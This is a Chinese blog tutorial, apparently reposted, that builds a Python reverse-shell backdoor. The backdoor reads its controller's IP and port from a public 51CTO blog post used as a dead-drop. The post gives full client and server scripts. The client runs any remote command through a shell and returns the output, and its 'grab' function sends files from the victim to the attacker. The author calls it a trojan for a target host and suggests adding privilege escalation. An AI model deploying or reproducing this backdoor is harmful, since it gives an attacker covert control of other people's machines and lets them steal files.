Python 反弹shell后门用51CTO Blog绑定

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Python 反弹shell后门用51CTO Blog绑定相关的知识,希望对你有一定的参考价值。

前言:仅做交流,仅做交流。

  除了51CTO当然也可以用其他的媒介啦,比如微博,微信等。这里就用51CTO吧

思路:存在这样的一个情况,我们在某台机器上放置一个木马~~~里面我们会写入自己服务端的IP,但是可能我们的IP会变,我们当然可以用域名解决这个问题,不过那样显得不是很优雅,而且域名要钱的啦~~~所以我们需要一个中间件!


  在说说什么是反弹Shell,反弹shell的好处在于被攻击的主机可能限制了进口,即只允许某个端口的链接,其他链接都屏蔽,这个时候我们就需要被攻击的主机主动来连我们的服务器,我们的服务器只要监听某个端口,等着被攻击的主机来连即可。

实现原理:

  目标主机访问51CTO网站,获取需要连接的服务器IP及端口。

  技术分享


怎么实现呢?

注:因为是教育目的性质,所以这里不会涉及什么更高级的功能,更高级的我也不会,这里就只是说明简单的TCP CLient,TCP Server端


首先创建一个简单的TCP服务端,用来监听连接过来的TCP CLient

#coding:utf-8
import socket
def connect():
    ###初始socket对象
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    ###绑定IP跟端口
    s.bind(("IP",PORT))
    ###允许一个连接,自行设定
    s.listen(1)
    
    ###调用accept方法,开始监听
    conn,addr = s.accept()
    ###输出client的连接信息,返回结果是一个ip加端口的元组
    print "---> we got a connection from: ",addr
    ###循化用于接收发送的命令
    while True:
        command = raw_input("shell>")
        ###如果命令中用exit关键词则关闭连接
        if "exit" in command:
            conn.send("exit")
            conn.close()
            break
        else:
            conn.send(command)
            print conn.recv(1024)
def main():
    connect()
if __name__ == ‘__main__‘:
    main()

然后我们创建TCP客户端,用来连接TCP 服务端

import socket
import subprocess
import os
host = "服务端IP"
port = 服务端PORT
def connect(host,port):
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((host,port))
    while True:
        command = s.recv(1024)
        if "exit" in command:
            s.close()
            break
        else:
            ###将服务端发送过来的命令通过subprocess执行
            CMD = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            ###返回标注输出,错误等
            s.send(CMD.stdout.read())
            s.send(CMD.stderr.read())
def main():
    connect(host,port)
if __name__ == ‘__main__‘:
    main()

因为没有判断连接不上服务端的情况,所以我们得先运行服务端,然后运行客户端,运行结果如下

技术分享

至此,第一步完成了。

现在我们需要将服务端的IP及端口放到51CTO Blog上。

技术分享

现在创建一篇如上图所示的博文。

然后用requests,beautifulSoup这两个库来获取我们想要的信息

import requests

import json

from bs4 import BeautifulSoup

url = "http://youerning.blog.51cto.com/"

在获取之前简单踩个点。

技术分享

    通过Chrom的调试模式,我们找到这段内容所对应的内容,比如div,class之类的,如上图所示我们找到的class="artContent mt10",这就是我们想要的信息,当然了,怎么用beautifulSoup筛选出我们需要的信息有很多种方法,这就就不一样说明了。

def getHost(url):

    ret = requests.get(url).content

    soup = BeautifulSoup(ret,"html.parser")

    for i in soup.find_all("div",class_="artContent mt10"):

        if i.string.startswith(" {"):

            ret = str(i.string)

    ret = json.loads(ret)

    return ret["host"],ret["port"]

print getHost(url)

运行结果如下

技术分享

至此,第二部也完成了,完整代码如下

客户端py文件

import socket
import subprocess
import os
import requests
import json
from bs4 import BeautifulSoup
url = "http://youerning.blog.51cto.com/"
def transfer(s,path):
    if os.path.exists(path):
        f = open(path,"rb")
        packet = f.read(1024)
        while packet != "":
            s.send(packet)
            packet = f.read(1024)
        s.send("Done")
        f.close()
def getHost(url):
    ret = requests.get(url).content
    soup = BeautifulSoup(ret,"html.parser")
    for i in soup.find_all("div",class_="artContent mt10"):
        if i.string.startswith(" {"):
            ret = str(i.string)
    ret = json.loads(ret)
    return ret["host"],ret["port"]
def connect(host,port):
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((host,port))
    while True:
        command = s.recv(1024)
        if "exit" in command:
            s.close()
            break
        elif "grab" in command:
            grab,path = command.split("*")
            try:
                transfer(s,path)
            except Exception,e:
                s.send(str(e))
                pass
        else:
            CMD = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
            s.send(CMD.stdout.read())
            s.send(CMD.stderr.read())
def main():
    host,port =  getHost(url)
    connect(host,port)
main()

服务端py文件

#coding:utf-8
import socket
IP = "你的IP"
PORT = 绑定的端口
def transfer(conn,command):
    conn.send(command)
    f = open("text.text","wb")
    while True:
        bits = conn.recv(1024)
        if "Unable to find out the file" in bits:
            print "---- Unbale to"
            break
        if bits.endswith("Done"):
            print "Done"
            f.close()
            break
        f.write(bits)
    f.close()
def connect():
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.bind(("IP",PORT))
    s.listen(1)
    conn,addr = s.accept()
    print "---> we got a connection from: ",addr
    while True:
        command = raw_input("shell>")
        if "exit" in command:
            conn.send("exit")
            conn.close()
            break
        elif "grab" in command:
            transfer(conn,command)
        else:
            conn.send(command)
            print conn.recv(1024)
def main():
    connect()
main()


后记:其实最后这两个完整的Python脚本,加了一个transfer函数,用于传输文件,算是一个彩蛋吧,虽然我不知道彩蛋是什么意思,不过还有很多功能可以加,比如查找文件,提权什么的。

    

本文出自 “又耳的笔记本” 博客,请务必保留此出处http://youerning.blog.51cto.com/10513771/1740646

以上是关于Python 反弹shell后门用51CTO Blog绑定的主要内容,如果未能解决你的问题,请参考以下文章

python正向连接后门

linux的shell后门尝试以及python快速转C

Python3实现——反弹shell

PHP后门反弹演示

各类后门整理!白帽黑客必备生存技能

msfconsole web后门